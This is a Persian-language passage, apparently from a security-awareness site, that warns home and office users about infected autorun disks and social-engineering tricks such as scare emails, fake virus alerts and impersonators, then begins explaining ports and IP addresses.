ﻧﻤﺎﯾﺪ ﮐﻪ ﺩﺭ ﺍﺛﺮ ﻣﺸﺎﻫﺪﻩ ﺁﻥ ﭼﻨﺎﻧﭽﻪ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺷﻤﺎ ﺍﺯ ﺍﯾﻤﻨﯽ ﮐﺎﻓﯽ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﺒﺎﺷﺪ ، ﮐﺪﻫﺎﯼ ﻣﺨﺮﺏ ﺑﺮ ﺭﻭﯼ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﯽ ﺁﯾﻨﺪ ﻭ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﯼ ﻧﻔﻮﺫ ﻫﻤﻮﺍﺭ ﻣﯽ ﮐﻨﻨﺪ . - ﺍﮔﺮ ﻧﻔﻮﺫﮔﺮ ﯾﮑﯽ ﺍﺯ ﺩﻭﺳﺘﺎﻥ ﯾﺎ ﺁﺷﻨﺎﯾﺎﻥ ﺷﻤﺎ ﺑﺎﺷﺪ ﻣﯽ ﺗﻮﺍﻧﺪ ﻓﺎﯾﻞ ﻣﺨﺮﺏ ﺭﺍ ﺑﺮ ﺭﻭﯼ ﯾﮏ ﺩﯾﺴﮑﺖ ﯾﺎ ﺳﯽ ﺩﯼ ﺧﻮﺩ ﺍﺟﺮﺍ ( Auto run ) ﺑﻪ ﺷﻤﺎ ﺑﺪﻫﺪ . ﺩﺭ ﺍﯾﻦ ﺻﻮﺭﺕ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺪﻭﻥ ﺍﯾﻨﮑﻪ ﻣﺘﻮﺟﻪ ﺑﺎﺷﯿﺪ، ﺑﺎ ﻣﺸﺎﻫﺪﻩ ﺍﯾﻦ ﺩﯾﺴﮑﺖ ﻭ ﯾﺎ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﯾﻦ ﺳﯽ ﺩﯼ ﺁﻟﻮﺩﻩ ﺩﺭ ﺩﺭﺍﯾﻮ ﺳﯽ ﺩﯼ ﺭﺍﻡ ، ﺩﺭ ﺧﻄﺮ ﻗﺮﺍﺭ ﺑﮕﯿﺮﯾﺪ . ﺑﺎﯾﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﮐﻪ ﺭﻭﺵ ﻫﺎﯼ ﻧﻔﻮﺫ ﺑﺴﯿﺎﺭ ﻣﺘﻨﻮﻉ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﻭﺍﻗﻊ ﻫﺮ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺳﻄﺢ ﺩﺍﻧﺶ ﻭ ﻣﻬﺎﺭﺕ ﻭ ﺳﻄﺢ ﻫﻮﺵ ، ﺭﻭﺵ ﻣﺘﻔﺎﻭﺗﯽ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻣﯽ ﮐﻨﺪ . ﺭﻭﺵ ﻫﺎﯼ ﺣﻤﻠﻪ ﻭﻗﺘﯽ ﻗﺪﺭﺕ ﺑﯿﺸﺘﺮﯼ ﻣﯽ ﯾﺎﺑﻨﺪ ﮐﻪ ﺑﺎ ﺭﻭﺵ ﻫﺎﯼ ﻫﻮﺷﻤﻨﺪﺍﻧﻪ ﻭ ﻣﺘﻔﮑﺮﺍﻧﻪ ﻫﻤﺮﺍﻩ ﺷﻮﻧﺪ . ﻧﻔﻮﺫﮔﺮﺍﻥ ﺣﺮﻓﻪ ﺍﯼ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷﯽ ﺑﻪ ﻧﺎﻡ ﻣﻬﻨﺪﺳﯽ ﺍﺟﺘﻤﺎﻋﯽ ( Social Engineering ) ﻫﺪﻑ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﻓﮑﺮﯼ ﻭﺍﺩﺍﺭ ﻣﯽ ﮐﻨﻨﺪ ﺗﺎ ﺑﺎ ﺩﺳﺖ ﺧﻮﺩ ﺩﺭﻫﺎﯼ ﻧﻔﻮﺫ ﺭﺍ ﺑﻪ ﺭﻭﯼ ﺁﻧﺎﻥ ﺑﮕﺸﺎﯾﺪ . ﺑﻪ ﭼﻨﺪ ﻣﺜﺎﻝ ﺩﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷﻬﺎﯼ ﻣﻬﻨﺪﺳﯽ ﺍﺟﺘﻤﺎﻋﯽ ﺗﻮﺟﻪ ﮐﻨﯿﺪ -: ( Email ) ﺍﯾﻤﯿﻠﯽ ﺩﺭ ﯾﺎﻓﺖ ﻣﯽ ﮐﻨﯿﺪ ﮐﻪ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﻣﻮﺭﺩ ﺧﺎﺻﯽ ﻫﺸﺪﺍﺭ ﻣﯽ ﺩﻫﺪ . ﺗﻮﺟﻪ ﮐﻨﯿﺪ ﺍﮔﺮ ﻧﻔﻮﺫﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﺷﻤﺎ ﺍﻃﻼﻋﺎﺕ ﮐﺎﻓﯽ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻤﮑﻦ ﺍﺳﺖ ﺍﯾﻤﯿﻠﯽ ﺣﺎﻭﯼ ﻣﻄﺎﻟﺒﯽ ﻧﮕﺮﺍﻥ ﮐﻨﻨﺪﻩ ﺩﺭ ﻣﻮﺭﺩ ﯾﮑﯽ ﺍﺯ ﺍﻗﻮﺍﻡ ﺷﻤﺎ ﻭ ﯾﺎ ﺩﺭ ﻣﻮﺭﺩ ﺷﻐﻠﺘﺎﻥ ﺑﻔﺮﺳﺘﺪ . ﺩﺭ ﺍﯾﻦ ﺍﯾﻤﯿﻞ ﭘﺲ ﺍﺯ ﺁﻧﮑﻪ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﮐﺎﻓﯽ ﻫﺮﺍﺳﺎﻥ ﮐﺮﺩ ﺍﺯ ﺷﻤﺎ ﺧﻮﺍﻫﺪ ﺧﻮﺍﺳﺖ ﺑﺮ ﺭﻭﯼ ﻟﯿﻨﮑﯽ ﮐﻪ ﺩﺭ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻠﯿﮏ ﮐﻨﯿﺪ ﻭ ﯾﺎ ﻓﺎﯾﻠﯽ ﺭﺍ ﮐﻪ ﺑﻪ ﺍﯾﻤﯿﻞ ﺿﻤﯿﻤﻪ ﺷﺪﻩ ﺑﺮ ﺭﻭﯼ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺧﻮﺩ ﺍﺟﺮﺍ ﮐﻨﯿﺪ ﺗﺎ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﯿﺸﺘﺮﯼ ﺩﺳﺖ ﯾﺎﺑﯿﺪ . - ﺍﯾﻤﯿﻞ ﻫﺎﯼ ﺗﺤﺮﯾﮏ ﮐﻨﻨﺪﻩ ﺩﺭﯾﺎﻓﺖ ﻣﯽ ﮐﻨﯿﺪ . ﻣﻤﮑﻦ ﺍﺳﺖ ﺍﯾﻦ ﺍﯾﻤﯿﻞ ﻫﺎ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻣﺸﺎﻫﺪﻩ ﺗﺼﺎﻭﯾﺮ ﺗﺤﺮﯾﮏ ﮐﻨﻨﺪﻩ ﺍﺯ ﺍﻓﺮﺍﺩ ﺧﺎﺹ ﻭ ﯾﺎ ﻫﻨﺮﭘﯿﺸﻪ ﻫﺎ ﻭ ﺧﻮﺍﻧﻨﺪﻩ ﻫﺎﯼ ﻣﻌﺮﻭﻑ ﺩﻋﻮﺕ ﮐﻨﺪ ﻭ ﯾﺎ ﺍﯾﻨﮑﻪ ﺑﺎ ﻭﻋﺪﻩ ﺑﺮﻧﺪﻩ ﺷﺪﻥ ﺟﻮﺍﯾﺰ ﮔﺮﺍﻥ ﻗﯿﻤﺖ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﮐﻠﯿﮏ ﺑﺮ ﺭﻭﯼ ﻟﯿﻨﮏ ﻭ ﯾﺎ ﺩﺭﯾﺎﻓﺖ ﻓﺎﯾﻞ ﺩﻋﻮﺕ ﻧﻤﺎﯾﺪ . - ﺩﺭ ﻭﺏ ﺳﺎﯾﺘﯽ ﺑﻪ ﺗﯿﺘﺮ ﺑﺰﺭﮒ ﻭ ﺟﻠﺐ ﺗﻮﺟﻪ ﮐﻨﻨﺪﻩ ﺍﯼ ﺑﺮ ﻣﯽ ﺧﻮﺭﯾﺪ ﮐﻪ ﺑﻪ ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﻣﯽ ﺩﻫﺪ ﮐﺎﻣﭙﯿﻮﺗﺮﺗﺎﻥ ﻫﺪﻑ ﺣﻤﻠﻪ ﻭﯾﺮﻭﺱ ﻫﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﻭ ﯾﺎ ﺳﺮﻋﺖ ﺁﻥ ﺑﺴﯿﺎﺭ ﺁﻫﺴﺘﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﺷﻤﺎ ﻣﯽ ﺧﻮﺍﻫﺪ ﺑﺎ ﺩﺍﻧﻠﻮﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭﯼ ﮐﻪ ﭘﯿﺸﻨﻬﺎﺩ ﻣﯽ ﮐﻨﺪ ﺍﯾﻦ ﻣﺸﮑﻞ ﺭﺍ ﺑﺮﻃﺮﻑ ﮐﻨﯿﺪ . - ﻓﺮﺩﯼ ﮐﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺍﯼ ﺭﺩﻩ ﺍﺩﺍﺭﯼ ﯾﺎ ﻧﻈﺎﻣﯽ ﺧﺎﺻﯽ ﻣﻌﺮﻓﯽ ﻣﯽ ﮐﻨﺪ ﺑﺎ ﺷﻤﺎ ﺗﻤﺎﺱ ﻣﯽ ﮔﯿﺮﺩ ( ﺍﺯ ﻃﺮﯾﻖ ﺍﻟﮑﺘﺮﻭﻧﯿﮏ ﻭ ﯾﺎ ﺍﺯ ﻃﺮﯾﻖ ﺗﻠﻔﻦ ) ﻭ ﺍﺯ ﺷﻤﺎ ﺧﻮﺍﺳﺘﺎﺭ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋﺎﺕ ﻣﻬﻤﯽ ﻣﯽ ﺷﻮﺩ . - ﺍﯾﻤﯿﻠﯽ ﺩﺭﯾﺎﻓﺖ ﻣﯽ ﮐﻨﯿﺪ ﻭ ﯾﺎ ﺩﺭ ﺳﺎﯾﺖ ﻭ ﯾﺎ ﻭﺑﻼﮔﯽ ﻣﯽ ﺧﻮﺍﻧﯿﺪ ﮐﻪ ﺑﻪ ﻃﺮﯾﻘﯽ ﻣﯽ ﺗﻮﺍﻥ ﮐﻠﻤﻪ ﻋﺒﻮﺭ ﺳﺎﯾﺮ ﺩﻭﺳﺘﺎﻥ ﻭ ﺁﺷﻨﺎﯾﺎﻥ ﺭﺍ ﺑﻪ ﺩﺳﺖ ﺁﻭﺭﺩ . ﺩﺭ ﺑﺮﺧﯽ ﺍﺯ ﻣﻮﺍﺭﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭﯼ ﻣﻌﺮﻓﯽ ﻣﯽ ﺷﻮﺩ ﮐﻪ ﺍﯾﻦ ﻗﺎﺑﻠﯿﺖ ﺭﺍ ﺩﺍﺭﺩ . ﺷﻤﺎ ﻧﯿﺰ ﺁﻥ ﺭﺍ ﺩﺭﯾﺎﻓﺖ ﻣﯽ ﮐﻨﯿﺪ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﯽ ﺩﻫﯿﺪ ﻏﺎﻓﻞ ﺍﺯ ﺍﯾﻨﮑﻪ ﺍﯾﻦ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ، ﺁﻟﻮﺩﻩ ﺑﻮﺩﻩ ﻭ ﺩﺭ ﻭﺍﻗﻊ ﮐﻠﻤﺎﺕ ﻋﺒﻮﺭ ﺧﻮﺩ ﺷﻤﺎ ﺭﺍ ﺳﺮﻗﺖ ﮐﺮﺩﻩ . ﻭ ﺩﻩ ﻫﺎ ﻣﻮﺭﺩ ﺩﯾﮕﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﺫﮐﺮ ﺗﻤﺎﻣﯽ ﺁﻧﻬﺎ ﺑﯽ ﻓﺎﯾﺪﻩ ﺍﺳﺖ . ﺑﺎﯾﺪ ﺗﻮﺟﻪ ﮐﻨﯿﺪ ﮐﻪ ﺩﺭ ﺍﯾﻦ ﺭﻭﺵ ﯾﻌﻨﯽ ﻣﻬﻨﺪﺳﯽ ﺍﺟﺘﻤﺎﻋﯽ ﺑﻪ ﻃﻮﺭ ﮐﻠﯽ ﺳﻌﯽ ﻣﯽ ﺷﻮﺩ ﻗﺮﺑﺎﻧﯽ ﺍﺯ ﻧﻈﺮ ﺭﻭﺍﻧﯽ ﺩﺭ ﻭﺿﻌﯿﺘﯽ ﻗﺮﺍﺭ ﮔﯿﺮﺩ ﮐﻪ ﺧﻮﺍﺳﺘﻪ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﮐﻨﺪ . ﻣﻤﮑﻦ ﺍﺳﺖ ﺩﺭ ﻣﻮﺍﺭﺩﯼ ﺷﻤﺎ ﺭﺍ ﺑﺘﺮﺳﺎﻧﻨﺪ ﻭ ﺩﺭ ﻣﻮﺍﺭﺩﯼ ﺑﻪ ﺷﻤﺎ ﻭﻋﺪﻩ ﻫﺎﯼ ﺩﺭﻭﻏﯿﻦ ﺑﺪﻫﻨﺪ ﻭ ﯾﺎ ﺷﻤﺎ ﺭﺍ ﻭﺳﻮﺳﻪ ﮐﻨﻨﺪ . ﺩﺭ ﺗﻤﺎﻣﯽ ﺍﯾﻦ ﻣﻮﺍﺭﺩ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﯾﺎﺩ ﻣﯽ ﺗﻮﺍﻧﯿﺪ ﺑﺎ ﺧﯿﺎﻝ ﺭﺍﺣﺖ ﻣﻮﺿﻮﻉ ﺭﺍ ﻧﺎﺩﯾﺪﻩ ﻭ ﻧﺎﺷﻨﯿﺪﻩ ﻓﺮﺽ ﮐﻨﯿﺪ ﻭ ﭼﻨﺎﻧﭽﻪ ﺍﯾﻦ ﻣﻮﺍﺭﺩ ﺟﻨﺒﻪ ﺑﺎﺝ ﺧﻮﺍﻫﯽ ﻭ ﻣﺰﺍﺣﻤﺖ ﭘﯿﺪﺍ ﮐﺮﺩ ﺑﺎ ﻣﻘﺎﻣﺎﺕ ﺍﻧﺘﻈﺎﻣﯽ ﻭ ﻗﻀﺎﯾﯽ ﻣﺸﻮﺭﺕ ﻧﻤﺎﯾﯿﺪ . ﺩﺭ ﻣﻮﺭﺩ ﺍﺩﺍﺭﺍﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﯾﺪ ﺭﻭﺷﻬﺎﯼ ﻧﻔﻮﺫ ﻣﺴﺘﻘﯿﻢ ﺭﺍ ﺑﯿﺸﺘﺮ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩ . ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗﻌﻤﯿﺮﮐﺎﺭﺍﻧﯽ ﮐﻪ ﻭﺍﺭﺩ ﺍﺭﮔﺎﻥ ﻣﯽ ﺷﻮﻧﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺩﺳﺘﺮﺳﯽ ﻫﺮﭼﻨﺪ ﮐﻮﭼﮑﯽ ﺑﻪ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺎ ﺑﯿﺎﺑﻨﺪ ﻭ ﻓﺮﺻﺖ ﮐﺎﻓﯽ ﻧﯿﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﮐﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺭﺍ ﺑﺮ ﺭﻭﯼ ﺁﻧﻬﺎ ﺍﺟﺮﺍ ﮐﻨﻨﺪ ﻭ ﯾﺎ ﺍﻃﻼﻋﺎﺕ ﮐﺎﻓﯽ ﺟﻬﺖ ﻧﻔﻮﺫ ﺑﻪ ﺩﺳﺖ ﺑﯿﺎﻭﺭﻧﺪ . ﺑﻪ ﻭﯾﮋﻩ ﺩﺭ ﻣﻮﺭﺩ ﺍﺩﺍﺭﺍﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﯾﯽ ﮐﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻭ ﺣﯿﺎﺗﯽ ﺩﺍﺭﻧﺪ ﺍﯾﻦ ﺍﺣﺘﻤﺎﻝ، ﯾﻌﻨﯽ ﺳﻌﯽ ﺩﺭ ﻧﻔﻮﺫ ﻣﺴﺘﻘﯿﻢ ﻫﻤﻮﺍﺭﻩ ﻣﻤﮑﻦ ﺍﺳﺖ - ﺍﮔﺮ ﭼﻪ ﺧﻄﺮﻧﺎﮎ ﺗﺮﯾﻦ - ، ﻭﻟﯽ ﺭﺍﺣﺖ ﺗﺮﯾﻦ ﺭﻭﺵ ﺑﺎﺷﺪ . ﻫﻤﺎﻧﻄﻮﺭ ﮐﻪ ﭘﯿﺸﺘﺮ ﺫﮐﺮ ﺷﺪ ﺭﻭﺵ ﻫﺎﯼ ﻧﻔﻮﺫ ﺑﺴﯿﺎﺭ ﻣﺘﻔﺎﻭﺕ ﻭ ﻣﺘﻨﻮﻉ ﺍﺳﺖ . ﻭﻇﯿﻔﻪ ﺷﻤﺎ ﺍﯾﻦ ﺍﺳﺖ ﮐﻪ ﺍﺣﺘﻤﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﯾﻦ ﺭﻭﺵ ﻫﺎ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﯿﺪ ﻭ ﺑﺎ ﺭﻋﺎﯾﺖ ﺍﺻﻮﻟﯽ ﮐﻪ ﺩﺭ ﺍﯾﻦ ﺳﺎﯾﺖ ﺧﻮﺍﻫﯿﺪ ﺁﻣﻮﺧﺖ ﮐﺎﺭﯼ ﮐﻨﯿﺪ ﮐﻪ ﺍﻃﻼﻋﺎﺕ ﺍﻟﮑﺘﺮﻭﻧﯿﮏ ﺷﻤﺎ ، ﺣﺘﯽ ﺩﺭ ﺻﻮﺭﺕ ﺩﺳﺘﺮﺳﯽ ﻣﺴﺘﻘﯿﻢ ، ﺑﺮﺍﯼ ﻧﻔﻮﺫﮔﺮ ﻏﯿﺮ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ . ﺩﺭ ﺍﯾﻨﺠﺎ ﻻﺯﻡ ﺍﺳﺖ ﻣﻘﺪﺍﺭﯼ ﺩﺭ ﻣﻮﺭﺩ ﻋﺒﺎﺭﺍﺗﯽ ﻧﻈﺮ ﭘﻮﺭﺕ (Port ) ، ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ( IP Address ) ﻭ ﭘﺮﻭﺗﻮﮐﻞ ﻫﺎﯼ ﺍﺭﺗﺒﺎﻃﯽ ﺑﺪﺍﻧﯿﺪ . ﻫﺮ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺩﺭﮔﺎﻩ ﻫﺎﯾﯽ ﺩﺍﺭﺩ ﮐﻪ ﺍﺯ ﻃﺮﯾﻖ ﺁﻥ ﻣﯽ ﺗﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﺟﻬﺎﻥ ﺧﺎﺭﺝ ﺩﺭﯾﺎﻓﺖ ﮐﻨﺪ ﻭ ﯾﺎ ﺩﺭ ﻗﺎﻟﺐ ﺧﺮﻭﺟﯽ ﻫﺎﯾﯽ ﺍﺯ ﻃﺮﯾﻖ ﺩﺭﮔﺎﻩ ﻫﺎ ﺑﻪ ﺟﻬﺎﻥ ﺧﺎﺭﺝ ﻣﻨﺘﻘﻞ ﮐﻨﺪ . ﺑﻪ ﺍﯾﻦ ﺩﺭﮔﺎﻩ ﻫﺎ ﭘﻮﺭﺕ (Port ) ﮔﻔﺘﻪ ﻣﯽ ﺷﻮﺩ . ﺍﺣﺘﻤﺎﻻ ﻣﺤﻞ ﺍﺗﺼﺎﻝ ﮐﯿﺒﻮﺭﺩ ، ﻣﺎﻭﺱ ﻭ ﻣﺎﻧﯿﺘﻮﺭ ﻭ ﺷﺎﯾﺪ ﺳﺎﯾﺮ ﻟﻮﺍﺯﻡ ﻧﻈﯿﺮ ﭘﺮﯾﻨﺘﺮ ، ﺍﺳﮑﻨﺮ ، ﯾﺎ ﺩﻭﺭﺑﯿﻦ ﻫﺎﯼ ﺩﯾﺠﯿﺘﺎﻝ ﺭﺍ ﺑﻪ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺩﯾﺪﻩ ﺍﯾﺪ . ﺍﯾﻦ ﻣﺤﻞ ﻫﺎ ﻫﻤﺎﻥ ﭘﻮﺭﺕ ﻫﺎ ﻫﺴﺘﻨﺪ . ﻭﻟﯽ ﺑﻪ ﻏﯿﺮ ﺍﺯ ﺍﯾﻦ ﭘﻮﺭﺗﻬﺎﯼ ﺳﺨﺖ ﺍﻓﺰﺍﺭﯼ ﺩﺭ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﻢ ﭘﻮﺭﺗﻬﺎﯾﯽ ﻭﺟﻮﺩ ﺩﺍﺭﺩ . ﺍﯾﻦ ﭘﻮﺭﺗﻬﺎ ﺍﻣﮑﺎﻥ ﺑﺮﻗﺮﺍﺭﯼ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺟﻬﺎﻥ ﺍﻟﮑﺘﺮﻭﻧﯿﮏ ﻧﻈﯿﺮ ﺍﯾﻨﺘﺮﻧﺖ ﻭ ﯾﺎ ﻫﺮ ﺷﺒﮑﻪ ﺩﯾﮕﺮ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﯽ ﮐﻨﻨﺪ . ﺗﻌﺪﺍﺩ ﭘﻮﺭﺗﻬﺎﯼ ﺳﺨﺖ ﺍﻓﺰﺍﺭﯼ ﺑﺴﯿﺎﺭ ﮐﻢ ﺍﺳﺖ ﻭﻟﯽ ﭘﻮﺭﺗﻬﺎﯼ ﻧﺮﻡ ﺍﻓﺰﺍﺭﯼ ﺑﻪ ﺗﻌﺪﺍﺩ ۶۵۵۳۵ ﻋﺪﺩ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ . ﺍﯾﻦ ﭘﻮﺭﺗﻬﺎ ( ﻧﺮﻡ ﺍﻓﺰﺍﺭﯼ ) ﺑﻪ ﺩﻭ ﺑﺨﺶ ﻋﻤﺪﻩ ﺗﻘﺴﯿﻢ ﻣﯽ ﺷﻮﻧﺪ . ۱ ) ﺩﺳﺘﻪ ﺍﻭﻝ ﭘﻮﺭﺗﻬﺎﯼ ۰ ﺗﺎ ۱۰۲۳ ﯾﺎ ﭘﻮﺭﺗﻬﺎﯼ ﺳﯿﺴﺘﻤﯽ . ﺍﯾﻦ ﭘﻮﺭﺗﻬﺎ ﺩﺭ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺗﻌﺮﯾﻒ ﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﺑﺮﺍﯼ ﻫﺮ ﯾﮏ ﺍﺯ ﺁﻧﻬﺎ ﻭﻇﺎﯾﻔﯽ ﻣﻌﯿﻦ ﺷﺪﻩ . ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﻮﺭﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﭘﺮﻭﺗﻮﮐﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﯾﻞ ( ftp ) ﺑﺎ ﺷﻤﺎﺭﻩ ۲۱ ﻭ ﭘﻮﺭﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺗﻮﺳﻂ ﭘﺮﻭﺗﻮﮐﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺮﺍ ﻣﺘﻦ (http ) ﺑﺎ ﺷﻤﺎﺭﻩ ۸۰ ﻣﺸﺨﺺ ﺷﺪﻩ ﺍﻧﺪ . ۲ ) ﺩﺳﺘﻪ ﺩﻭﻡ ﭘﻮﺭﺗﻬﺎﯼ ۱۰۲۴ ﺗﺎ ۶۵۵۳۵ ﮐﻪ ﺗﻌﺪﺍﺩﯼ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﺧﺎﺹ ﻫﻤﺎﻧﻨﺪ Outlook ﺗﻌﺮﯾﻒ ﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭﻟﯽ ﺗﻌﺪﺍﺩ ﺑﯿﺸﻤﺎﺭﯼ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺗﻌﺮﯾﻒ ﺷﺪﻩ ﺍﯼ ﻧﺪﺍﺭﻧﺪ . ﺩﺭ ﺑﺨﺶ ﻫﺎﯼ ﺑﻌﺪ ﺧﻮﺍﻫﯿﺪ ﺁﻣﻮﺧﺖ ﮐﻪ ﭼﮕﻮﻧﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻣﺨﺮﺏ ﺍﺯ ﺍﯾﻦ ﭘﻮﺭﺗﻬﺎ ﺟﻬﺖ ﺍﺗﺼﺎﻝ ﺑﻪ ﺳﯿﺴﺘﻢ ﻫﮑﺮ ، ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽ ﮐﻨﻨﺪ . ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ( IP Address ) : ﺁﯾﺎ ﺗﺎ ﺑﻪ ﺣﺎﻝ ﺑﻪ ﺍﯾﻦ ﺍﻣﺮ ﺍﻧﺪﯾﺸﯿﺪﻩ ﺍﯾﺪ ﮐﻪ ﭼﮕﻮﻧﻪ ﺩﻭ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺩﺭ ﯾﮏ ﺷﺒﮑﻪ ﯾﺎ ﺩﺭ ﺍﯾﻨﺘﺮﻧﺖ ﻣﯽ ﺗﻮﺍﻧﻨﺪ ﺑﺎ ﯾﮑﺪﯾﮕﺮ ﻣﺒﺎﺩﻟﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ؟ ﺑﻪ ﻭﯾﮋﻩ ﺩﺭ ﺷﺒﮑﻪ ﺍﯼ ﺑﺎ ﺗﻌﺪﺍﺩ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺎﯼ ﺑﺴﯿﺎﺭ ﺯﯾﺎﺩ ﻫﻤﺎﻧﻨﺪ ﺍﯾﻨﺘﺮﻧﺖ . ﭼﮕﻮﻧﻪ ﺷﻤﺎ ﻣﯽ ﺗﻮﺍﻧﯿﺪ ﯾﮏ ﺗﺼﻮﯾﺮ ﺭﺍ ﺍﺯ ﻃﺮﯾﻖ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﯾﺎﻫﻮ ﻣﺴﻨﺠﺮ ﺑﻪ ﺩﻭﺳﺘﺘﺎﻥ ﺑﻔﺮﺳﺘﯿﺪ ؟ ﺑﺮﺍﯼ ﺍﯾﻦ ﺍﺭﺗﺒﺎﻁ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺎ ﺍﺣﺘﯿﺎﺝ ﺑﻪ ﯾﮏ ﺁﺩﺭﺱ ﺩﺭ ﺷﺒﮑﻪ ﺩﺍﺭﻧﺪ . ﺁﺩﺭﺳﯽ ﮐﻪ ﻫﻤﺎﻧﻨﺪ ﺁﺩﺭﺱ ﭘﺴﺘﯽ ﺩﺭ ﺩﻧﯿﺎﯼ ﻭﺍﻗﻌﯽ ، ﻣﺒﺪﺍ ﻭ ﻣﻘﺼﺪ ﺭﺳﯿﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ ﻭ ﺍﺯ ﺳﺎﯾﺮ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺎ ﺟﺪﺍ ﻣﯽ ﻧﻤﺎﯾﺪ . ﻫﺮ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﻨﮕﺎﻣﯽ ﮐﻪ ﺑﻪ ﺍﯾﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﯽ ﺷﻮﺩ ﺁﺩﺭﺳﯽ ﺑﯽ ﻫﻤﺘﺎ ﺩﺭ ﺷﺒﮑﻪ ﺧﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﮐﻪ ﻣﺤﻞ ﺭﺳﯿﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺑﻪ/ﺍﺯ ﺁﻥ ﺭﺍ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ . ﺍﯾﻦ ﺁﺩﺭﺱ ﮐﻪ ﯾﮏ ﺁﺩﺭﺱ ﺩﺭ ﻣﺒﻨﺎﯼ ؟؟؟ .؟؟؟ . ؟؟؟ . ؟؟؟ ﺍﺳﺖ ﺩﺭ ﻭﺍﻗﻊ ﯾﮏ ﻋﺪﺩ 